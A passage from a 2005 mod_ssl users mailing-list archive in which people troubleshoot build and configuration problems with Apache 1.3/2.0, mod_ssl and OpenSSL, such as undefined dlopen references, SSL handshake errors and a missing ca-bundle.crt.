      -o httpd buildmark.o modules.o modules/standard/libstandard.a modules/ssl/libssl.a main/libmain.a ./os/unix/libos.a ap/libap.a regex/libregex.a lib/expat-lite/libexpat.a  -lm -lcrypt  -lssl -lcrypto
#/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x35): In function `dlfcn_load':
: undefined reference to `dlopen'
#/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x95): In function `dlfcn_load':
: undefined reference to `dlclose'
#/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0xbc): In function `dlfcn_load':
: undefined reference to `dlerror'
#/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x147): In function `dlfcn_bind_var':
: undefined reference to `dlsym'
#/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x172): In function `dlfcn_bind_var':
: undefined reference to `dlerror'
#/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x237): In function `dlfcn_bind_func':
: undefined reference to `dlsym'
#/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x262): In function `dlfcn_bind_func':
: undefined reference to `dlerror'
#/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x50b): In function `dlfcn_unload':
: undefined reference to `dlclose'
collect2: ld returned 1 exit status
make[2]: *** [target_static] Error 1
make[2]: Leaving directory `#/apache_1.3.33/src'
make[1]: *** [build-std] Error 2
make[1]: Leaving directory `#/apache_1.3.33'
make: *** [build] Error 2
#apache_1.3.33#


No errors when compile openssl 0-9-8

best regards
Salvador


--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  8 03:08:10 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C4E4A14D9AC; Fri,  8 Jul 2005 03:08:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sindel.bascom.com (sindel.bascom.com [69.18.148.68])
	by master.modssl.org (Postfix) with ESMTP id 5AF1414D97B
	for ; Fri,  8 Jul 2005 03:08:07 +0200 (CEST)
Received: (from root@localhost)
	by sindel.bascom.com (8.12.10/8.12.10/SuSE Linux 0.7) id j68187bX014965
	for modssl-users@modssl.org; Thu, 7 Jul 2005 21:08:07 -0400
Received: from dcomobxp (sandstorm-red.bascom.com [69.18.165.2])
	by sindel.bascom.com (8.12.10/8.12.10/SuSE Linux 0.7) with ESMTP id j6817pBm014772
	for ; Thu, 7 Jul 2005 21:08:00 -0400
From: "Drew J. Como" 
To: 
Subject: Problem starting mod_ssl and apache
Date: Thu, 7 Jul 2005 21:09:44 -0400
Message-ID: <001a01c58359$bd27b030$19013c0a@dcomobxp>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Importance: Normal
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on sindel.bascom.com
X-Spam-Level: 
X-Spam-Status: No, score=-5.9 required=6.0 tests=ALL_TRUSTED,BAYES_00 
	autolearn=failed version=3.0.4
X-scanner: Scanned by Xamime-LT 0.1.5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

All,

I am having an interesting problem where I am
getting the following error message when I start
Apache:

Cannot load /usr/lib/apache/mod_sxnet.so into server: shared object not =
open

I have built the following rpms from their source
packages, which are all the latest versions.
(apache-1.3.33, mod_ssl-2.8.23, openssl-0.9.8)

Anyone have an idea as to what is wrong?  (Or what
I built wrong??)

Thanks :-)

Drew


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  8 16:18:03 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C363F14EACB; Fri,  8 Jul 2005 16:18:03 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sindel.bascom.com (sindel.bascom.com [69.18.148.68])
	by master.modssl.org (Postfix) with ESMTP id 590A814EA8E
	for ; Fri,  8 Jul 2005 16:18:02 +0200 (CEST)
Received: (from root@localhost)
	by sindel.bascom.com (8.12.10/8.12.10/SuSE Linux 0.7) id j68EI72e004711
	for modssl-users@modssl.org; Fri, 8 Jul 2005 10:18:07 -0400
Received: from dcomobxp (sandstorm-red.bascom.com [69.18.165.2])
	by sindel.bascom.com (8.12.10/8.12.10/SuSE Linux 0.7) with ESMTP id j68EHrBm004596
	for ; Fri, 8 Jul 2005 10:18:02 -0400
From: "Drew J. Como" 
To: 
Subject: RE: Problem starting mod_ssl and apache
Date: Fri, 8 Jul 2005 10:19:40 -0400
Message-ID: <000101c583c8$175a7830$19013c0a@dcomobxp>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.6626
In-Reply-To: <001a01c58359$bd27b030$19013c0a@dcomobxp>
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on sindel.bascom.com
X-Spam-Level: 
X-Spam-Status: No, score=-5.9 required=6.0 tests=ALL_TRUSTED,BAYES_00 
	autolearn=failed version=3.0.4
X-scanner: Scanned by Xamime-LT 0.1.5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Drew J. Como" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

All,

Ignore the previous e-mail.  After spending time
reading through my config, spec and make files,
I found my issues and they are now corrected.

Thanks :-)

Drew

-----Original Message-----
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]
On Behalf Of Drew J. Como
Sent: Thursday, July 07, 2005 9:10 PM
To: modssl-users@modssl.org
Subject: Problem starting mod_ssl and apache


All,

I am having an interesting problem where I am
getting the following error message when I start
Apache:

Cannot load /usr/lib/apache/mod_sxnet.so into server: shared object not =
open

I have built the following rpms from their source
packages, which are all the latest versions.
(apache-1.3.33, mod_ssl-2.8.23, openssl-0.9.8)

Anyone have an idea as to what is wrong?  (Or what
I built wrong??)

Thanks :-)

Drew


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul  8 21:06:59 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EFC6014D9A0; Fri,  8 Jul 2005 21:06:58 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cobi.astro-radio.intranet (251.Red-213-97-147.pooles.rima-tde.net [213.97.147.251])
	by master.modssl.org (Postfix) with ESMTP id 0E5FE14D99C
	for ; Fri,  8 Jul 2005 21:06:22 +0200 (CEST)
Received: from sal.astro-radio.intranet (sal.astro-radio.intranet [192.168.100.3])
	by cobi.astro-radio.intranet (8.12.10/8.12.10) with ESMTP id j68J6JH8018996
	for ; Fri, 8 Jul 2005 21:06:20 +0200
From: Salvador Caballe 
To: modssl-users@modssl.org
Subject: Re: Compile error
Date: Fri, 8 Jul 2005 21:06:07 +0200
User-Agent: KMail/1.5.4
References: <20050707200637.C143.EA3BKZ@amsat.org>
In-Reply-To: <20050707200637.C143.EA3BKZ@amsat.org>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-15"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200507082106.07874.ea3bkz@amsat.org>
X-Virus-Scanned: by amavisd-milter (http://amavis.org/)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Salvador Caballe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

A Dijous 07 Juliol 2005 20:12, Salvador Caballe va escriure:
> I just download the latest mod_ssl version, to upgrade
> my apache server.
>
>
> I installed and compiled the previous versions without problems, but I have
> this errors when compile apache program with mod_ssl:
>
> gcc -c  -I./os/unix -I./include   -DLINUX=22 -DHAVE_SET_DUMPABLE
> -DMOD_SSL=208123 -DUSE_HSREGEX -DEAPI -DUSE_EXPAT -I./lib/expat-lite
> -DNO_DL_NEEDED `./apaci` modules.c gcc -c  -I./os/unix -I./include  
> -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208123 -DUSE_HSREGEX -DEAPI
> -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci` buildmark.c gcc 
> -DLINUX=22 -DHAVE_SET_DUMPABLE -DMOD_SSL=208123 -DUSE_HSREGEX -DEAPI
> -DUSE_EXPAT -I./lib/expat-lite -DNO_DL_NEEDED `./apaci`
> -L/home/users/scaballe/openssl-0.9.8   \ -o httpd buildmark.o modules.o
> modules/standard/libstandard.a modules/ssl/libssl.a main/libmain.a
> ./os/unix/libos.a ap/libap.a regex/libregex.a lib/expat-lite/libexpat.a 
> -lm -lcrypt  -lssl -lcrypto
>
> #/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x35): In function 
`dlfcn_load':
> : undefined reference to `dlopen'
>
> #/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x95): In function 
`dlfcn_load':
> : undefined reference to `dlclose'
>
> #/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0xbc): In function 
`dlfcn_load':
> : undefined reference to `dlerror'
>
> #/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x147): In function 
`dlfcn_bind_var':
> : undefined reference to `dlsym'
>
> #/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x172): In function 
`dlfcn_bind_var':
> : undefined reference to `dlerror'
>
> #/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x237): In function 
`dlfcn_bind_func':
> : undefined reference to `dlsym'
>
> #/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x262): In function 
`dlfcn_bind_func':
> : undefined reference to `dlerror'
>
> #/openssl-0.9.8/libcrypto.a(dso_dlfcn.o)(.text+0x50b): In function 
`dlfcn_unload':
> : undefined reference to `dlclose'
>
> collect2: ld returned 1 exit status
> make[2]: *** [target_static] Error 1
> make[2]: Leaving directory `#/apache_1.3.33/src'
> make[1]: *** [build-std] Error 2
> make[1]: Leaving directory `#/apache_1.3.33'
> make: *** [build] Error 2
> #apache_1.3.33#
>

 I found the solution in the list archives:

http://marc.theaimsgroup.com/?l=apache-modssl&m=102865024908732&w=2

Salvador

-- 

 

APRS on line:
http://www.ea3bkz.com/aprs.html

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jul 11 13:50:05 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8EBD914D99B; Mon, 11 Jul 2005 13:50:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from freemail.as.ro (freemail.as.ro [193.230.153.134])
	by master.modssl.org (Postfix) with ESMTP id 3837F14D975
	for ; Mon, 11 Jul 2005 13:50:04 +0200 (CEST)
Received: from localhost (unknown [127.0.0.1])
	by freemail.as.ro (As.Ro Email Service) with ESMTP id 443F0727D
	for ; Mon, 11 Jul 2005 14:50:04 +0300 (EEST)
Received: from freemail.as.ro ([127.0.0.1])
 by localhost (freemail.as.ro [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 24654-04 for ;
 Mon, 11 Jul 2005 14:50:03 +0300 (EEST)
Received: from [192.168.1.57] (pc05.obiectsoft.iasi.rdsnet.ro [82.77.25.20])
	by freemail.as.ro (As.Ro Email Service) with ESMTP id DD5F3724F
	for ; Mon, 11 Jul 2005 14:50:03 +0300 (EEST)
Message-ID: <42D25CEC.2010802@gmail.com>
Date: Mon, 11 Jul 2005 14:50:04 +0300
From: Cosmin 
User-Agent: Mozilla Thunderbird 1.0.2 (Windows/20050317)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: errors
Content-Type: multipart/alternative;
 boundary="------------030503060806010703060909"
X-Virus-Scanned: amavisd-new at as.ro
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cosmin 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------030503060806010703060909
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Hi,
I'm tring to configure apache with mod_ssl and I get some weird errors:

[Mon Jul 11 14:53:10 2005] [error] mod_ssl: SSL handshake failed (server 
www.example.com:443, client 192.168.1.2) (System and OpenSSL library 
errors follow)
[Mon Jul 11 14:53:10 2005] [error] System: Permission denied (errno: 13)
[Mon Jul 11 14:53:10 2005] [error] OpenSSL: 
error:81086072:lib(129):func(134):reason(114)
[Mon Jul 11 14:53:10 2005] [error] OpenSSL: 
error:81095076:lib(129):func(149):reason(118)
[Mon Jul 11 14:53:10 2005] [error] OpenSSL: error:1408B005:SSL 
routines:SSL3_GET_CLIENT_KEY_EXCHANGE:DH lib

Does anybody know what I'm doing wrong. Please help
My server configuration:
 - Apache/1.3.33 (Unix, Solaris)
 - mod_ssl/2.8.22
 - OpenSSL/0.9.7d

--------------030503060806010703060909
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit




  


Hi,

I'm tring to configure apache with mod_ssl and I get some weird errors:



[Mon Jul 11 14:53:10 2005] [error] mod_ssl: SSL handshake failed
(server www.example.com:443, client 192.168.1.2) (System and OpenSSL
library errors follow)

[Mon Jul 11 14:53:10 2005] [error] System: Permission denied (errno: 13)

[Mon Jul 11 14:53:10 2005] [error] OpenSSL:
error:81086072:lib(129):func(134):reason(114)

[Mon Jul 11 14:53:10 2005] [error] OpenSSL:
error:81095076:lib(129):func(149):reason(118)

[Mon Jul 11 14:53:10 2005] [error] OpenSSL: error:1408B005:SSL
routines:SSL3_GET_CLIENT_KEY_EXCHANGE:DH lib



Does anybody know what I'm doing wrong. Please help

My server configuration:

 - Apache/1.3.33 (Unix, Solaris)

 - mod_ssl/2.8.22

 - OpenSSL/0.9.7d




--------------030503060806010703060909--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jul 12 01:59:52 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 47DDD14D98C; Tue, 12 Jul 2005 01:59:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail23.messagelabs.com (mail23.messagelabs.com [193.109.254.99])
	by master.modssl.org (Postfix) with SMTP id C8DDF14D984
	for ; Tue, 12 Jul 2005 01:59:51 +0200 (CEST)
X-VirusChecked: Checked
X-Env-Sender: David.Matthews@northtyneside.gov.uk
X-Msg-Ref: server-24.tower-23.messagelabs.com!1121126390!37690012!1
X-StarScan-Version: 5.4.15; banners=northtyneside.gov.uk,-,-
X-Originating-IP: [217.206.230.2]
Received: (qmail 20299 invoked from network); 11 Jul 2005 23:59:50 -0000
Received: from unknown (HELO gateway.northtyneside.gov.uk) (217.206.230.2)
  by server-24.tower-23.messagelabs.com with SMTP; 11 Jul 2005 23:59:50 -0000
Received: from zeus by gateway.northtyneside.gov.uk
	(MDaemon.PRO.v8.0.1.R)
	with ESMTP id md50001335449.msg
	for ; Tue, 12 Jul 2005 01:06:20 +0100
Subject: David Matthews/Information Technology/ntc is out of the office.
From: David.Matthews@northtyneside.gov.uk
To: modssl-users@modssl.org
Message-ID: 
Date: Tue, 12 Jul 2005 01:01:34 +0100
X-MIMETrack: Serialize by Router on zeus/ntc(Release 5.0.11  |July 24, 2002) at 12/07/2005
 01:01:35
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
X-Spam-Processed: gateway.northtyneside.gov.uk, Tue, 12 Jul 2005 01:06:20 +0100
	(not processed: message from valid local sender)
X-MDRemoteIP: 10.100.5.20
X-Return-Path: David.Matthews@northtyneside.gov.uk
X-MDaemon-Deliver-To: modssl-users@modssl.org
X-MDAV-Processed: gateway.northtyneside.gov.uk, Tue, 12 Jul 2005 01:06:23 +0100
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: David.Matthews@northtyneside.gov.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I will be out of the office starting  09/07/2005 and will not return until
19/07/2005.

I will respond to your message when I return from my holiday.
If you have a problem then please contact the ICT Service Desk on 200 5444

Thanks




________________________________________________________________________
This email has been scanned for all viruses by the MessageLabs SkyScan
service. North Tyneside Council does not guarantee this email to be free of any viruses. It is the responsibility of the recipient to ensure that this message and any attachments are virus free.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 13 10:51:09 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 69BE414D99F; Wed, 13 Jul 2005 10:51:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.el.net (mail.el.net [68.165.89.90])
	by master.modssl.org (Postfix) with ESMTP id C59D014D974
	for ; Wed, 13 Jul 2005 10:51:08 +0200 (CEST)
Received: (qmail 81307 invoked by uid 1008); 13 Jul 2005 08:51:58 -0000
Received: from unknown (HELO mail.el.net) (127.0.0.1)
  by mail.el.net with SMTP; 13 Jul 2005 08:51:58 -0000
Received: from 24.90.33.115
        (SquirrelMail authenticated user kalin@el.net);
        by mail.el.net with HTTP;
        Wed, 13 Jul 2005 04:51:58 -0400 (EDT)
Message-ID: <60570.24.90.33.115.1121244718.squirrel@24.90.33.115>
Date: Wed, 13 Jul 2005 04:51:58 -0400 (EDT)
Subject: https
From: "kalin mintchev" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.3a
X-Mailer: SquirrelMail/1.4.3a
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
References: 
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "kalin mintchev" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi all...

i tried http-users list without success...

i recently upgraded httpd from 1.3.x to 2.0.54. compiled httpd with mod_ssl.
OpenSSL 0.9.7e...
i remember that when building 1.3.x with mod_ssl the certificate was done
at the time of compilation of the server. now with 2.0.54 i'm trying the
instruction on:
http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#realcert

i did follow this a few times and that didn't work. then i did this a few
times:
http://www.samspublishing.com/articles/article.asp?p=30115&seqNum=4&rl=1

it didn't work either..  in both cases the message i get is that the
connection is refused...

the only difference between the old 1.3.x apache build on the machine and
the new 2.0.54 is these two lines below in the ssl conf section.
when i start the new one i get a message that ca-bundle.crt is missing -
and it is. on the old machine it came with the apache src. there isn't
such file here now. i could copy it but maybe that's not a great idea, is it?

SSLCACertificatePath /usr/local/httpd/conf/ssl.crt
SSLCACertificateFile /usr/local/httpd/conf/ssl.crt/ca-bundle.crt

i need this issue resolved relatively soon because that's the only thing
stopping this machine to go in production...

thanks a lot...


--




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 15 12:32:13 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 674FC14D9BC; Fri, 15 Jul 2005 12:32:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id 23C9C14D98C
	for ; Fri, 15 Jul 2005 12:32:12 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Fri, 15 Jul 2005 12:31:11 +0200
Message-ID: <001201c58928$55a63420$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References:  <60570.24.90.33.115.1121244718.squirrel@24.90.33.115>
Subject: Re: https
Date: Fri, 15 Jul 2005 12:31:17 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

There has been some discussion about that here lately.
RS Engelschall said he would include a script that would
produce a ca-bunde.crt from the Mozilla certdata.txt file
in version 2.8.23 of mod_ssl which should be available
now.

kind regards
/Daniel

----- Original Message ----- 
From: "kalin mintchev" 
To: 
Sent: Wednesday, July 13, 2005 10:51 AM
Subject: https


> hi all...
>
> i tried http-users list without success...
>
> i recently upgraded httpd from 1.3.x to 2.0.54. compiled httpd with
mod_ssl.
> OpenSSL 0.9.7e...
> i remember that when building 1.3.x with mod_ssl the certificate was done
> at the time of compilation of the server. now with 2.0.54 i'm trying the
> instruction on:
> http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#realcert
>
> i did follow this a few times and that didn't work. then i did this a few
> times:
> http://www.samspublishing.com/articles/article.asp?p=30115&seqNum=4&rl=1
>
> it didn't work either..  in both cases the message i get is that the
> connection is refused...
>
> the only difference between the old 1.3.x apache build on the machine and
> the new 2.0.54 is these two lines below in the ssl conf section.
> when i start the new one i get a message that ca-bundle.crt is missing -
> and it is. on the old machine it came with the apache src. there isn't
> such file here now. i could copy it but maybe that's not a great idea, is
it?
>
> SSLCACertificatePath /usr/local/httpd/conf/ssl.crt
> SSLCACertificateFile /usr/local/httpd/conf/ssl.crt/ca-bundle.crt
>
> i need this issue resolved relatively soon because that's the only thing
> stopping this machine to go in production...
>
> thanks a lot...
>
>
> --
>
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jul 15 12:37:49 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 06B9414D9B6; Fri, 15 Jul 2005 12:37:49 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id BC70014D9A9
	for ; Fri, 15 Jul 2005 12:37:48 +0200 (CEST)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Fri, 15 Jul 2005 12:37:07 +0200
Message-ID: <001b01c58929$29d9ef20$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: 
References: <42D25CEC.2010802@gmail.com>
Subject: Re: errors
Date: Fri, 15 Jul 2005 12:37:13 +0200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0018_01C58939.ED4D3B50"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0018_01C58939.ED4D3B50
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

That is not very much information but one possible reason
I can think of from the top of my head (I'm no guru) is this.
Make sure you're connecting with ssl and not http. Most
browsers need to have https:// specified as far as I know.
Trying to connect to http://www.example.com:443/ will not
work since it's trying to connect with http protocol on a
server only allowing ssl-protocol (they are completely
different).
Use https://www.example.com instead.
SSL establishes connection and then HTTP is tunneled
inside of the SSL protocol.

Just a thought.

Kind regards
/Daniel

  ----- Original Message -----=20
  From: Cosmin=20
  To: modssl-users@modssl.org=20
  Sent: Monday, July 11, 2005 1:50 PM
  Subject: errors


  Hi,
  I'm tring to configure apache with mod_ssl and I get some weird =
errors:

  [Mon Jul 11 14:53:10 2005] [error] mod_ssl: SSL handshake failed =
(server www.example.com:443, client 192.168.1.2) (System and OpenSSL =
library errors follow)
  [Mon Jul 11 14:53:10 2005] [error] System: Permission denied (errno: =
13)
  [Mon Jul 11 14:53:10 2005] [error] OpenSSL: =
error:81086072:lib(129):func(134):reason(114)
  [Mon Jul 11 14:53:10 2005] [error] OpenSSL: =
error:81095076:lib(129):func(149):reason(118)
  [Mon Jul 11 14:53:10 2005] [error] OpenSSL: error:1408B005:SSL =
routines:SSL3_GET_CLIENT_KEY_EXCHANGE:DH lib

  Does anybody know what I'm doing wrong. Please help
  My server configuration:
   - Apache/1.3.33 (Unix, Solaris)
   - mod_ssl/2.8.22
   - OpenSSL/0.9.7d

------=_NextPart_000_0018_01C58939.ED4D3B50
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









That is not very much information but =
one possible=20
reason


I can think of from the top of my head =
(I'm no=20
guru) is this.


Make sure you're connecting with ssl =
and not http.=20
Most


browsers need to have https:// =
specified as far as=20
I know.


Trying to connect to http://www.example.com:443/ =
will=20
not


work since it's trying to connect with http protocol on a


server only allowing ssl-protocol (they are completely


different).


Use https://www.example.com instead=
.


SSL establishes connection and then =
HTTP is=20
tunneled


inside of the SSL =
protocol.


 


Just a thought.


 


Kind regards


/Daniel


 


  
----- Original Message ----- 

  From:=20
  Cosmin=20
  
  
  
Sent: Monday, July 11, 2005 =
1:50 PM

  
Subject: errors

  

Hi,
I'm tring to configure apache with mod_ssl and I =
get=20
  some weird errors:

[Mon Jul 11 14:53:10 2005] [error] =
mod_ssl:=20
  SSL handshake failed (server www.example.com:443, client =
192.168.1.2)=20
  (System and OpenSSL library errors follow)
[Mon Jul 11 14:53:10 =
2005]=20
  [error] System: Permission denied (errno: 13)
[Mon Jul 11 14:53:10 =
2005]=20
  [error] OpenSSL: error:81086072:lib(129):func(134):reason(114)
[Mon =
Jul 11=20
  14:53:10 2005] [error] OpenSSL:=20
  error:81095076:lib(129):func(149):reason(118)
[Mon Jul 11 14:53:10 =
2005]=20
  [error] OpenSSL: error:1408B005:SSL =
routines:SSL3_GET_CLIENT_KEY_EXCHANGE:DH=20
  lib

Does anybody know what I'm doing wrong. Please =
help
My=20
  server configuration:
 - Apache/1.3.33 (Unix, =
Solaris)
 -=20
  mod_ssl/2.8.22
 - =
OpenSSL/0.9.7d


------=_NextPart_000_0018_01C58939.ED4D3B50--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jul 20 12:35:51 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9909F14D9AD; Wed, 20 Jul 2005 12:35:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mbi-hq-it-ex001.mbi.co.at (firewall.mbi.co.at [80.64.133.20])
